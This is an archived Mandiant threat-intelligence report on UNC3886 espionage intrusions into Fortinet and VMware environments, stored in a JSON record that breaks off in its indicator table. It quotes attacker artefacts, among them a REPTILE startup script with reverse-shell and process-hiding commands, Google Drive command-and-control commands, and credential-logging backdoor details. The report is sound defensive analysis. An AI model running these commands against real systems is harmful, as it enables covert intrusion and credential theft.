{
	"id": "4bd80746-74ac-42f7-9681-2784478312f3",
	"created_at": "2026-04-06T00:12:47.848414Z",
	"updated_at": "2026-04-10T03:32:46.173397Z",
	"deleted_at": null,
	"sha1_hash": "51672fafe669cf99d78fbf7393084e04cf008325",
	"title": "Cloaked and Covert: Uncovering UNC3886 Espionage Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1190518,
	"plain_text": "Cloaked and Covert: Uncovering UNC3886 Espionage Operations\r\nBy Mandiant\r\nPublished: 2024-06-18 · Archived: 2026-04-05 17:26:40 UTC\r\nWritten by: Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, Alex\r\nMarvi\r\nFollowing the discovery of malware residing within ESXi hypervisors in September 2022, Mandiant began\r\ninvestigating numerous intrusions conducted by UNC3886, a suspected China-nexus cyber espionage actor that\r\nhas targeted prominent strategic organizations on a global scale. In January 2023, Mandiant provided detailed\r\nanalysis of the exploitation of a now-patched vulnerability in FortiOS employed by a threat actor suspected to be\r\nUNC3886. In March 2023, we provided details surrounding a custom malware ecosystem utilized on affected\r\nFortinet devices. Furthermore, the investigation uncovered the compromise of VMware technologies, which\r\nfacilitated access to guest virtual machines.\r\nInvestigations into more recent operations in 2023 following fixes from the vendors involved in the investigation\r\nhave corroborated Mandiant's initial observations that the actor operates in a sophisticated, cautious, and evasive\r\nnature. Mandiant has observed that UNC3886 employed several layers of organized persistence for redundancy to\r\nmaintain access to compromised environments over time. 
Persistence mechanisms encompassed network devices,\r\nhypervisors, and virtual machines, ensuring alternative channels remain available even if the primary layer is\r\ndetected and eliminated.\r\nThis blog post discusses UNC3886's intrusion path and subsequent actions that were performed in the\r\nenvironments after compromising the guest virtual machines to achieve access to the critical systems, including:\r\nThe use of publicly available rootkits for long-term persistence\r\nDeployment of malware that leveraged trusted third-party services for command and control (C2 or C\u0026C)\r\nSubverting access and collecting credentials with Secure Shell (SSH) backdoors\r\nExtracting credentials from TACACS+ authentication using custom malware \r\nMandiant has published detection and hardening guidelines for ESXi hypervisors and attack techniques employed\r\nby UNC3886. For Google SecOps Enterprise+ customers, rules have been released to your Emerging Threats rule\r\npack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied\r\nThreat Intelligence. Mandiant recommends that organizations follow the security recommendations within the\r\nVMware and Fortinet advisories and the security recommendations provided in this blog post.\r\nZero-Day Exploitation\r\nIn January 2024, Mandiant published a blog post detailing UNC3886's activities exploiting CVE-2023-34048\r\n(VMware vCenter) since late 2021. The exploitation enables unauthenticated remote command execution on\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 1 of 26\n\nvulnerable vCenter servers. Mandiant observed deployment of attacker backdoors minutes after crashing of the\r\nvulnerable VMware service.\r\nCVE-2023-34048 was not the only zero-day vulnerability exploited by UNC3886 during these intrusions. 
The\r\nthreat actor exploited three other zero-day vulnerabilities, which have since been patched, to gain access when\r\nobtaining and abusing credentials of existing accounts was infeasible. Figure 1 describes the UNC3886 attack path\r\ninvolving the following zero-day exploitations:\r\nCVE-2022-41328 in FortiOS was exploited to download and execute backdoors on FortiGate devices.\r\nCVE-2022-22948 in VMware vCenter was exploited to obtain encrypted credentials in the vCenter's\r\npostgresDB for further access.\r\nCVE-2023-20867 in VMware Tools was exploited to execute unauthenticated Guest Operations from ESXi\r\nhost to guest virtual machines.\r\nFigure 1: UNC3886 attack path diagram\r\nMandiant observed the threat actor exploit CVE-2022-42475 in FortiOS's Secure Sockets Layer (SSL) virtual\r\nprivate network (VPN) to obtain access in January 2023 after details of the vulnerability had been made public by\r\nFortinet as part of their vulnerability disclosure processes. CVE-2022-42475 allows a remote unauthenticated\r\nattacker to execute arbitrary code or commands via specifically crafted requests.\r\nUse of Publicly Available Rootkits for Long-Term Persistence\r\nAfter exploiting zero-day vulnerabilities to gain access to vCenter servers and subsequently managed ESXi\r\nservers, the actor obtained total control of guest virtual machines that shared the same ESXi server as the vCenter\r\nserver. Mandiant observed the actor use two publicly available rootkits, REPTILE and MEDUSA, on the guest\r\nvirtual machines to maintain access and evade detection.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 2 of 26\n\nREPTILE\r\nREPTILE is an open-source Linux rootkit, implemented as a loadable kernel module (LKM), that provides\r\nbackdoor access to a system. 
The rootkit and backdoor functionalities are implemented as a separate component\r\nidentified by Mandiant as follows:\r\nREPTILE.CMD is a user-mode component responsible for communicating with the kernel-mode\r\ncomponent to perform actions including hiding files, processes, and network connections.\r\nREPTILE.SHELL is a reverse shell backdoor running in user-mode. The component could be configured to\r\nlisten for a specialized packet in TCP, UDP, or ICMP for activation.\r\nREPTILE kernel-level component is an LKM responsible for hooking kernel functions and modifying\r\nfunctions data as tasked by REPTILE.CMD to achieve rootkit functionality.\r\nREPTILE LKM launcher is responsible for decrypting the actual kernel module code from the file and\r\nloading into the memory.\r\nREPTILE appeared to be the rootkit of choice by UNC3886 as it was observed being deployed immediately after\r\ngaining access to compromised endpoints. REPTILE offers both the common backdoor functionality, such as\r\ncommand execution and file transfer capabilities, as well as stealth functionality that enables the threat actor to\r\nevasively access and control the infected endpoints via port knocking.\r\nMandiant observed that UNC3886 introduced several changes into the REPTILE code base and its auxiliary\r\ncomponents. Some changes are based on the REPTILE code base before version 2.1, which was introduced on\r\nMarch 1, 2020, potentially indicating the actor has been developing and/or operating this rootkit for some time. \r\nOne such change was identified within the UNC3886 REPTILE LKM launcher. In REPTILE version 2.0, the\r\noriginal developer of REPTILE altered how the kernel-level component is loaded, switching from using insmod\r\nto a custom launcher. The launcher Mandiant observed UNC3886 use throughout their operations, based on the\r\ncustom launcher, was updated with a new function to daemonize a process. 
This function is identical to the\r\npublicly available create_daemon.c .\r\nUNC3886 automated the deployment of REPTILE components with shell scripts. These scripts contained similar\r\ncode to the installation script responsible for building REPTILE components and configuring a persistence\r\nmechanism for the REPTILE kernel-level component. The following additions were observed in the deployment\r\nshell script, which resulted in the creation of different forensic artifacts from the original REPTILE:\r\n1. The threat actor replaced every instance of \"reptile\" with a unique keyword, which resulted in different\r\nfilenames for rootkit component files.\r\nFile Full Path Description\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_cmd REPTILE.CMD executable\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 3 of 26\n\n/var/lib/fwupdd/\u003cunique_keyword\u003e_reverse REPTILE.SHELL executable\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_start REPTILE startup shell script\r\n/lib/modules/\u003ckernel_version\u003e/kernel/driver\r\ns/\u003cunique_keyword\u003e/\u003cunique_keyword\u003e\r\nREPTILE kernel-level component\r\n/usr/bin/\u003cunique_keyword\u003e REPTILE LKM launcher\r\n2. The script only deploys the pre-built REPTILE components and files to the paths listed as follows, and\r\nconfigures persistence mechanisms; it does not build the components.\r\n3. While the original REPTILE relies on modprobe and udev in newer versions to load the kernel-level\r\ncomponent, UNC3886 REPTILE relies on creating new RC scripts or systemd unit files with a command\r\nto execute REPTILE LKM launcher to load the kernel-level component, presented as follows. 
Only a few\r\nREPTILE samples were observed using udev as a persistence mechanism.\r\n/usr/bin/\u003c /lib/modules/\u003ckernel_version\u003e/kernel/drivers/\r\n\u003cunique_keyword\u003e/\u003cunique_keyword\u003e 2\u003e\u0026- 1\u003e\u0026- 0\u003c\u0026-\r\nAside from the modifications made to the deployment shell script by the threat actor, the threat actor introduced a\r\nstartup script containing execution commands and parameters for REPTILE.CMD and REPTILE.SHELL. The\r\nfollowing is a sample of the startup script identified from one of the compromised guest virtual machines.\r\n#!/bin/bash\r\n#\u003cCentos_Selinux_Config_And_Module\u003e\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_reverse -t \u003cip_address\u003e\r\n-p \u003cport\u003e -s \u003csecret\u003e -r \u003cseconds\u003e\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_cmd hide `ps -ef | grep\r\n\"ata/0\" | grep -v grep | awk '{print $2}'`\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_cmd file-tampering\r\n#\u003c/Centos_Selinux_Config_And_Module\u003e\r\nThe startup script tasks REPTILE.SHELL to connect back to the command-and-control (C2 or C\u0026C) server and\r\nlater configures REPTILE.CMD to hide the REPTILE.SHELL process from a process listing result and hide files\r\nfrom being visible. The analysis of the REPTILE samples revealed that the REPTILE.CMD was developed to hide\r\nfile contents enclosed with a string #\u003c/Centos_Selinux_Config_And_Module\u003e when the component is executed\r\nwith a file-tampering parameter.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 4 of 26\n\nMandiant identified a customized sample of REPTILE listeners with Transport Layer Security (TLS) support. The\r\nsample is able to receive communications using TLS over raw Transmission Control Protocol (TCP). 
Mandiant\r\nobserved the threat actor deployed the customized version of REPTILE along with the victim's legitimate TLS\r\ncertificate and private key obtained from the compromised FortiGate devices.\r\nWhile UNC3886 was observed deploying new rootkits and backdoors with more functionalities, REPTILE\r\nappeared to be the first option to establish a foothold and possibly the last resort for maintaining access due to its\r\nsmall footprints.\r\nMEDUSA and SEAELF\r\nMEDUSA is an open-source rootkit implementing dynamic linker hijacking via LD_PRELOAD. Unlike\r\nREPTILE, which only provides an interactive access with rootkit functionalities, MEDUSA exhibits capabilities\r\nof logging user credentials from the successful authentications, either locally or remotely, and command\r\nexecutions. These capabilities are advantageous to UNC3886 as their modus operandi to move laterally using\r\nvalid credentials.\r\nMandiant assessed the use of MEDUSA to be experimental alternatives of REPTILE and SSH keyloggers. The\r\nadoption of REPTILE was usually observed after the threat actor successfully gained access to compromised\r\nendpoints where it was used to deploy other malware, keyloggers, and utilities. MEDUSA, however, has been\r\ndeployed subsequently on the same compromised endpoints in more recent activities.\r\nDeployment of MEDUSA was accomplished by the MEDUSA installer component, identified by Mandiant as\r\nSEAELF. Mandiant identified two versions of MEDUSA deployed in the compromised endpoints, both using\r\n0xAA as the XOR encryption key to encrypt configuration strings. Mandiant FLARE observed the following\r\nchanges made by the threat actor to the samples:\r\n1. The execve function that would normally filter output from iptables , ip , and the /bin directory no\r\nlonger filter such output.\r\n2. Output from strace , when executed by execve , is redirected to /tmp/orbit.txt by appending -o\r\n/tmp/orbit.txt to the command line.\r\n3. 
The PAM functions no longer report SSH information and disrupt sudo requests by always returning\r\nPAM_SUCCESS(0) . \r\n4. The following hook functions are missing in the sample:\r\n1. hosts_access\r\n2. shutdown\r\n3. close\r\n4. pam_acct_mgmt\r\n5. pam_sm_authenticate\r\n6. xread\r\nMoreover, the file system evidence indicated changes to the MEDUSA configuration in one version that resulted\r\nin the creation and presence of various MEDUSA artifacts and host-based indicator locations as presented in the\r\nfollowing table.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 5 of 26\n\nName Default Value First Sample Second Sample\r\nMEDUSA administrator\r\nname\r\nadm1n Y0u4reCu6e Y0u4reCu6e\r\nMEDUSA administrator\r\npassword\r\nasdfasdf 1qaz@WSX3edc123 1qaz@WSX3edc123\r\nMEDUSA home directory /usr/lib/libc conf\r\n/usr/lib/libc\r\nconf/\r\n/usr/lib/locate/\r\nssh, scp, and sudo credential\r\nlog\r\n/usr/lib/libseconf\r\n/sshpass2.txt\r\n/usr/lib/libseconf\r\n/local.txt\r\n/usr/lib/locate\r\n/local.txt\r\nsshd credential log\r\n/usr/lib/libseconf\r\n/sshpass.txt\r\n/var/log\r\n/remote.txt\r\n/var/log\r\n/remote.txt\r\nBackdoor listening ports\r\n/usr/lib/libc\r\nconf/.ports\r\n/usr/lib/libc\r\nconf/.pts\r\n/usr/lib/locate\r\n/.pts\r\nMandiant observed the threat actor deploying and executing tools via MEDUSA to capture SSH valid credentials\r\nfrom the compromised endpoints. Upon starting, MEDUSA was configured to execute commands and executables\r\nlisted under /usr/lib/locate/.boot.sh as follows:\r\n/usr/sbin/libvird\r\n/usr/bin/NetworkManage\r\nchcon -t sshd_tmp_t /var/run/cron.data\r\nThe executables and the command constitute a component of the threat actor's attempt to hijack SSH connections\r\nwith the objective of acquiring SSH credentials. 
Analysis of the executables and their attempts is discussed later in\r\nthis report.\r\nMalware Leveraging Trusted Third Parties as C2 Channel\r\nThe threat actor was observed deploying malware, including MOPSLED and RIFLESPINE, that leverages trusted\r\nthird parties like GitHub and Google Drive as C2 channels while relying on the rootkits for persistence.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 6 of 26\n\nMOPSLED\r\nMOPSLED is a shellcode-based modular backdoor that has the capability to communicate over HTTP or a custom\r\nbinary protocol over TCP to its C2 server. The core functionality of MOPSLED involves expanding its capabilities\r\nby retrieving plugins from the C2 server. MOPSLED also uses a custom ChaCha20 encryption algorithm to\r\ndecrypt embedded and external configuration files.\r\nMandiant observed sharing of MOPSLED between other Chinese cyber espionage groups including APT41.\r\nMandiant considered MOPSLED to be an evolution of CROSSWALK, which can act as a network proxy.\r\nMandiant observed UNC3886 deploy the Linux variant, identified as MOPSLED.LINUX, on vCenter servers and\r\na small number of the compromised endpoints where REPTILE already existed. MOPSLED.LINUX appeared to\r\nbe used only as an initial malware deployed after gaining successful access since the malware does not have\r\nrootkit-like capabilities that could evade detection.\r\nMOPSLED.LINUX was developed to communicate with a dead-drop URL to retrieve an actual C2 address. The\r\nsample associated with UNC3886 was observed sending HTTP GET requests to\r\nhttps://cyberponke.github[.]io/* . The response was decrypted using the ChaCha20 cipher to obtain the\r\nactual C2 IP address. Further communications are implemented as a custom binary protocol similar to HTTP/S.\r\nRIFLESPINE\r\nRIFLESPINE is a cross-platform backdoor that leverages Google Drive to transfer files and execute commands. 
It\r\nadopts the CryptoPP library to implement the AES algorithm to encrypt and decrypt the data transmitted between\r\nan affected machine and the threat actor.\r\nTo instruct RIFLESPINE, the threat actor creates an encrypted file on Google Drive with instructions for\r\nRIFLESPINE that is then executed by the malware on the target endpoint. The target endpoint's MAC address\r\nmust appear in the filename when it is created. The file is downloaded, RIFLESPINE downloads and decrypts the\r\nfile, and executes the instructions. The executions' outputs will be encrypted, stored in a temporary file, and then\r\nuploaded to Google Drive once more. The following instructions are available for execution:\r\n1. Download file with get command.\r\n2. Upload file with put command.\r\n3. Set next call out time in milliseconds with settime.\r\n4. Execution arbitrary commands with /bin/sh.\r\nUNC3886 deployed RIFLESPINE with an open-source Google Drive CLI client. A systemd service file was\r\ncreated and used to execute the malware as the malware does not contain a persistence mechanism. Upon first\r\ninstallation, the malware collects system information and starts communicating with Google Drive service with\r\nthe following steps:\r\n1. Execute gdrive to obtain the file pertinent to the target endpoint with the following command:\r\ngdrive --refresh-token \u003ctoken\u003e list | grep \"2@\u003cmac_address\u003e\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 7 of 26\n\n2. Write the filename to a temporary file /tmp/syslog\u003crandom_number.rs.\r\n3. Download file to /tmp matching the filename with the following command:\r\ngdrive --refresh-token \u003ctoken\u003e download --path \"/tmp\" -f\r\n4. Decrypt file /tmp/\u003cfilename\u003e to /tmp/\u003cdownload_filename\u003e.de using CryptoPP AES-CBC with key\r\nlibcrypt.so.2 and IV libev.so.5.\r\n5. 
Read /tmp/\u003cdownload_filename\u003e.de line by line for instructions to execute.\r\n6. After executing the instructions, write output to /tmp/update\u003crandom_number\u003e.tmp.\r\n7. Encrypt response from /tmp/update\u003crandom_number.tmp to /tmp/update\u003crandom_number\u003e.tmp.en using\r\nthe same AES keys as decryption.\r\n8. Upload encrypted response with the following command:\r\ngdrive --refresh-token \u003ctoken\u003e upload --name \"/tmp\r\n/update\u003crandom_number\u003e.tmp.en\"\r\n9. Delay and repeat the previous steps.\r\nSimilar to MOPSLED.LINUX, RIFLESPINE was observed only in a small number of the compromised virtual\r\nmachines. It is reasonable to assume that the threat actor abandoned the idea of using MOPSLED.LINUX and\r\nRIFLESPINE, which do not have rootkit functionality, as backdoors because predictable communications to\r\nGitHub and Google Drive services from virtual machine servers, rather than workstations, could raise suspicions.\r\nSubverting Accesses With Backdoored Applications\r\nMandiant observed UNC3886 relying heavily on collecting and utilizing valid credentials for lateral movement\r\nbetween guest virtual machines running on the compromised VMware ESXi. The following section describes\r\ndifferent techniques used by the threat actor to collect and abuse valid credentials.\r\nBackdoored SSH Executables\r\nAfter gaining access to the guest virtual machines, either through the collection of vpxuser credentials or by\r\nexploiting CVE-2023-20867 in conjunction with VMware Guest Operations abuse to facilitate malicious file\r\ntransfer and execution, UNC3886 was observed deploying backdoored SSH clients and daemons. 
The purpose of\r\nthese malicious components was the interception and collection of credentials within an XOR-encrypted text file.\r\nAnalysis of the compromised SSH client located at /usr/bin/ssh exposed modifications by the threat actor to\r\nthe userauth_passwd() function, which governs password-based authentication. These modifications (detailed in\r\nFigure 2) introduce instructions designed to harvest SSH credentials from outgoing connections. The credentials\r\nare then XORed with 0xef before storage in the file /var/log/ldapd\u003cunique_keyword\u003e.2.gz .\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 8 of 26\n\nFigure 2: Backdoored userauth_passwd()function\r\nTo facilitate the targeted collection of incoming SSH credentials, threat actors introduced modifications to the\r\nSSH daemon executable located at /usr/sbin/sshd . These modifications were specifically implemented within\r\nthe auth_password() function, responsible for managing password-based authentication within the SSH daemon,\r\nand the sshpam_auth_passwd() function, which facilitates integration with Pluggable Authentication Modules\r\n(PAM). The injected malicious code functions analogously to that observed within the SSH client. However, in\r\nthis instance, harvested credentials are stored within the file /var/log/ldapd\u003cunique_keyword\u003e.1.gz .\r\nFigure 3: Backdoored auth_password()function\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 9 of 26\n\nFigure 4: Backdoored sshpam_auth_passwd() function\r\nIn more recent threat actor activities, Mandiant observed the threat actor installed yum-versionlock to ensure\r\nthat the malicious SSH clients and daemons would survive package upgrades. 
yum-versionlock enables the\r\nthreat actor to exclude OpenSSH-related packages from the upgrade by adding the current version of OpenSSH\r\npackages to the versionlock.list file. Content of the versionlock.list file is presented as follows with the\r\ntimestamp when the locks were added.\r\n# Added lock on Tue Oct 25 23:28:07 2022\r\nopenssh-clients-0:8.0p1-13.el8.*\r\nopenssh-server-0:8.0p1-13.el8.*\r\nBring Your Own SSH Server\r\nIn addition to the backdoored SSH binaries deployed to collect SSH credentials, the threat actor was observed\r\nleveraging MEDUSA rootkit to deploy a custom SSH server with the same malicious goals.\r\nPer the findings from MEDUSA rootkit analysis, Mandiant indicated that the threat actor utilized BOOT_SCRIPT\r\nparameter of MEDUSA located at /usr/lib/locate/.boot.sh to execute the following executables and a\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 10 of 26\n\ncommand on boot:\r\n/usr/sbin/libvird\r\n/usr/bin/NetworkManage\r\nchcon -t sshd_tmp_t /var/run/cron.data\r\nThe hijacking of SSH connections to obtain credentials starts with the execution of /usr/sbin/libvird .\r\nLibvird , which is an injector based on a publicly available kubo/injector project embedded with a payload.\r\nlibvird creates a library file identified as /lib64/libseconfd.so from the embedded payload and injects the\r\nlibrary to sshd by default if both the target program and the library file are not provided.\r\nMandiant recovered and conducted analysis of the file with the same hash as the payload embedded in libvird .\r\nThe analysis observed that the payload intercepts checkfd() of sshd when executed and verifies if the\r\nreceived data contains SSH-2.0-OpenSSH_6pf . The payload redirects the stream to the Unix socket\r\n/var/run/cron.data .\r\nMandiant identified /usr/bin/NetworkManage as a SSH server based on a publicly available SSH server\r\nwzshiming/sshd. 
The SSH server creates, monitors, and picks up the connection redirected to the Unix socket\r\n/var/run/cron.data .\r\nLastly, the final command inside /usr/lib/locate/.boot.sh was used to apply the SELinux security context of\r\nthe Unix socket file /var/run/cron.dat to be the predefined sshd_tmp_t context, which is the security context\r\ntailored to temporary files used by the SSH daemon. This to ensure that the Unix socket used by the injector and\r\nthe custom SSH server is accessible and writable when SELinux is enabled.\r\nThe threat actor was observed deploying another injector identified as sentry and the custom SSH server\r\nidentified as sshdng-venter-7.0 on another endpoint. Analysis of the two executables identified the same\r\ninjection and redirection operations as observed with libvird and NetworkManage .\r\nToward the Intrusion Goals\r\nThe Remnants of Internal Recon and Lateral Movement\r\nThe objectives of the threat actor were initially unclear due to limited visibility and the extensive use of rootkits,\r\ntools, and scripts to eliminate forensic artifacts. When considering goal achievement, it is trivial to assume that a\r\ncyber espionage threat actor would focus on specific information. Yet pinpointing the exact type of information\r\nbecomes challenging as it is situational. After a comprehensive analysis of the unallocated space of the\r\ncompromised endpoints acting as a jump server, Mandiant identified some evidence that indicated what the threat\r\nactor's ultimate intentions may have been.\r\nMandiant successfully recovered scan logs generated by NMAP. The scan logs were created using the -oG\r\nparameter, which resulted in the recording of detailed scan information, including the NMAP executable, the scan\r\ninitiation timestamp, the options, and the scan result. The sample log is presented as follows. 
Note that\r\ninformation related to victim organizations is redacted.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 11 of 26\n\n# Nmap 6.49BETA1 scan initiated [redacted] as: ./sc -sS -Pn -n\r\n--open --host-timeout 30 -T4 -v -oG result.txt -p 902,2012,4786,443\r\nA.B.C.D/24\r\n# Ports scanned: TCP(4;443,902,2012,4786) UDP(0;) SCTP(0;) PROTOCOLS(0;)\r\nHost: A.B.C.1 () Ports: 443/open/tcp//https///,\r\n4786/open/tcp//smart-install///\r\nIgnored State: filtered (2)\r\nHost: A.B.C.1 () Status: Up\r\nHost: A.B.C.1 () Status: Timeout\r\nHost: A.B.C.2 () Status: Up\r\nHost: A.B.C.2 () Ports: 4786/open/tcp//smart-install///\r\nIgnored State: filtered (3)\r\nHost: A.B.C.3 () Status: Up\r\nHost: A.B.C.3 () Ports: 443/open/tcp//https///\r\nIgnored State: filtered (3)\r\nHost: A.B.C.4 () Status: Up\r\nHost: A.B.C.4 () Status: Ports: 902/open/tcp//ideafarm-door///\r\nIgnored State: filtered (3)\r\nHost: A.B.C.5 () Status: Up\r\nHost: A.B.C.5 () Status: Timeout\r\nHost: A.B.C.6 () Status: Up\r\nHost: A.B.C.6 () Ports: 4786/open/tcp//smart-install///\r\nIgnored State: filtered (3)\r\n.......\r\nThe following observations were made from the sample scan log:\r\nNMAP executable: The threat actor brought their own NMAP executable for scanning. The executable\r\nsc was also located on the unallocated space and identified as a stand-alone version of the NMAP.\r\nScanning parameters: TCP SYN scan was initiated in the aggressive mode without DNS resolution and\r\nhost discovery, targeting TCP/443, TCP/902, TCP/2012, and TCP/4786 of 10.A.B.C/24 . 
The result was\r\nrecorded to result.txt with a record of only open or possibly open ports.\r\nScanning results: The result indicates alive hosts with the open ports.\r\nWith the assumption that the services running on the alive hosts configured with the default port number, the alive\r\nhosts identified with TCP/4786 were possibly Cisco network appliances as the port is commonly assigned for\r\nCisco Smart Install (SMI) service. TCP/902 indicates VMware technologies. By aggregating data from other scan\r\nlogs and validating with the victim, it was established that the targeted networks belonged to foreign networks\r\nunder the management of the victim organization. This marked the point at which a supply chain attack scenario\r\nbecame conceivable.\r\nThe existence of NMAP scan logs suggests that there is connectivity from the jump server to the foreign networks,\r\nalthough accessibility requires legitimate credentials. The final clue aligned with this assumption as the ongoing\r\ninvestigation uncovered malicious activities on a TACACS+ server accessible from the jump server.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 12 of 26\n\nTACACS is a network protocol used in computer networking for providing centralized authentication,\r\nauthorization, and accounting (AAA) service. TACACS+ represents an enhanced and more robust version of the\r\noriginal TACACS protocol. Network appliances employ TACACS+ for security and access control, ensuring that\r\nauthenticated users are authorized to execute actions that are monitored for auditing purposes.\r\nAn unauthorized access to a system functioning as an authentication server like a TACACS+ server is an absolute\r\nsecurity nightmare. The threat actor could access or manipulate user credentials and authorization policies stored\r\nwithin its database. 
Accountability of TACACS+ would also be affected as the threat actor could tamper with the\r\naccounting logs stored on the TACACS+ server, covering their tracks and concealing malicious activities.\r\nThe following sections describe actions performed by the threat actor to extend their access to the target network\r\nappliances.\r\nCapturing TACACS+ Credentials with LOOKOVER\r\nThe threat actor's first attempt to extend their access to the network appliances by targeting the TACACS server\r\nwas the use of LOOKOVER. LOOKOVER is a sniffer written in C that processes TACACS+ authentication\r\npackets, performs decryption, and writes its contents to a specified file path. LOOKOVER uses the publicly\r\navailable libpcap library to sniff TCP packets.\r\nThe threat actor deployed LOOKOVER on the TACACS+ server at /usr/sbin/au\u003cunique_keyword\u003editd . The\r\nsample required the following environment variables to be configured:\r\nTKEY - TACACS+ pre-shared key; contains default key 7ujm^YHN (required)\r\nFILTER - libpcap filter string (required)\r\nDEVICE - libpcap capture device (optional)\r\nSNFILENAME - processed data output path, optional with default set to /var/lib/libsyslog.so . All data\r\nwritten to this file is XORed with the single byte 0xEF .\r\nAnalysis of the LOOKOVER sample indicates that the samples process TCP packets whose first two bytes of data\r\nare 0xC0 and 0x01 and verify if the next byte is 0x01 or 0x03 . The pattern aligns with TACACS+ packet\r\nheader as described in RFC 8907 as follows:\r\n0xC0 indicates the major ( 0xC ) and the minor ( 0x0 ) TACACS+ version number.\r\n0x01 indicates that the packet type is TAC_PLUS_AUTHEN.\r\nThe next byte indicates the sequence number of the current packet; LOOKOVER targets if the sequence\r\nnumber is 0x01 or 0x03 , which are commonly packets sent from the client to the TACACS+ server.\r\nThe sample verifies if the flag bit is 0x0 , which indicates that the payload is encrypted. 
If the flag bit is 0x0 ,\r\nthe sample then performs TACACS+ decryption by incorporating the first 12 bytes of TCP along with TKEY into\r\nan MD5 hash and uses the hash to XOR-decode the remainder of the TCP data. The decoded data along with the\r\npacket source IP address and an integer from the first 12 bytes are written to SNFILENAME .\r\nIf the next byte is nonzero, which could indicate a plain text payload, the entire data segment of the TCP packet is\r\nwritten to FILENAME .\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 13 of 26\n\nFigure 5: LOOKOVER's function responsible for handling TACACS+ packets\r\nDuring the analysis of the compromised TACACS+ server, Mandiant identified the presence of\r\n/usr/sbin/au\u003cunique_keyword\u003editd core dump file. Analysis of the core dump file revealed that the threat actor\r\nconfigured the FILTER environment variable as port 49 with /var/log/tac_cisco_\u003cunique_keyword\u003e_log as\r\nSNFILENAME . TCP/49 is used by TACACS+ Login Host protocol to handle an authentication request from\r\ndevices. The process crashed when attempting to encrypt extracted credentials before writing to disks, and this\r\ncould influence the threat actor to employ another approach to target TACACS+.\r\nBackdoored TACACS+ Binary\r\nOn the same TACACS+ server identified with LOOKOVER, Mandiant observed the threat actor replaced the\r\nlegitimate /usr/bin/tac_plus , which is the TACACS+ daemon for Linux, with a malicious version containing\r\ncredential logging functionality.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 14 of 26\n\nThe malicious version of /usr/bin/tac_plus was modified with a new function responsible for logging\r\nTACACS+ credentials to /var/log/tacu\u003cunique_keyword\u003ecs.log . 
The function was inserted into verify() , after the password has been validated, and into passwd_file_verify() , which confirms a credential against the password file; in both places it runs only after the password has been confirmed correct, so only credentials that authenticated successfully are logged. Each captured credential record is XOR-ed with 0xEF before being appended to the credential log file, the same single-byte encoding LOOKOVER applies to its output.\r\nFigure 6: Malicious function within tac_plus for capturing credentials\r\nFigure 7: Backdoored authentication function of tac_plus\r\nThe Family of VMCI Backdoors\r\nMandiant discovered a new variant of backdoors that use the Virtual Machine Communication Interface (VMCI) as their communication channel. The VMCI backdoors can carry either guest-to-guest or host-to-guest communication to achieve command execution over a channel that bypasses the guest's network stack, and therefore network-based monitoring. See the overview of the attacker's use of ESXi hypervisor VMCI communications for more information.\r\nVIRTUALSHINE is a simple VMware VMCI sockets-based backdoor that provides access to a bash shell. VIRTUALSHINE connects to a specified target (a VMCI context ID and port) and streams a bash pty over that socket.\r\nVIRTUALPIE is a backdoor written in Python that spawns a daemonized IPv6 listener on a hard-coded TCP port. It supports file transfer, arbitrary command execution, and reverse shell capabilities. It communicates using a custom protocol, and the data is encrypted using RC4.\r\nVIRTUALSPHERE is the controller part of a simple VMCI-based backdoor. The malware transmits its second command-line argument over the VMCI socket to the server component running inside the target VM.\r\nWe plan to release technical details of the VMCI backdoors in a future blog post.\r\nCampaign 23-022 and Indicators of Compromise\r\nSince March 2023, we have tracked UNC3886 activity leveraging zero-day exploits for Fortinet and VMware technologies as part of Campaign 23-022 in Mandiant Advantage for our customers. 
The majority of organizations that Mandiant has responded to or identified as targets through our own analysis have been located in the North America, Southeast Asia, or Oceania regions. However, we have also identified evidence of additional victims located in Europe, Africa, and other parts of Asia. The industries Mandiant has observed being targeted are those typically seen in espionage operations, namely governments, telecommunications, technology, aerospace and defense, and the energy and utility sectors.\r\nTo assist the wider community in hunting for and identifying the activity outlined in this blog post, we have included a subset of the related indicators of compromise (IOCs) in this post and in a publicly available GTI Collection.\r\nHost-Based Indicators\r\nFilename MD5 Family Role ( - in the Family column means no family was assigned)\r\ngl.py 381b7a2a6d581e3482c829bfb542a7de - UTILITY\r\ninstall-20220615.py 876787f76867ecf654019bd19409c5b8 - INSTALLER\r\nlsuv2_nv.v01 827d8ae502e3a4d56e6c3a238ba855a7 - ARCHIVE\r\npayload1.v00 9ea86dccd5bbde47f8641b62a1eeff07 - ARCHIVE\r\nrdt fcb742b507e3c074da5524d1a7c80f7f - ARCHIVE\r\nsendPacket.py 129ba90886c5f5eb0c81d901ad10c622 - UTILITY\r\nsendPacket.py 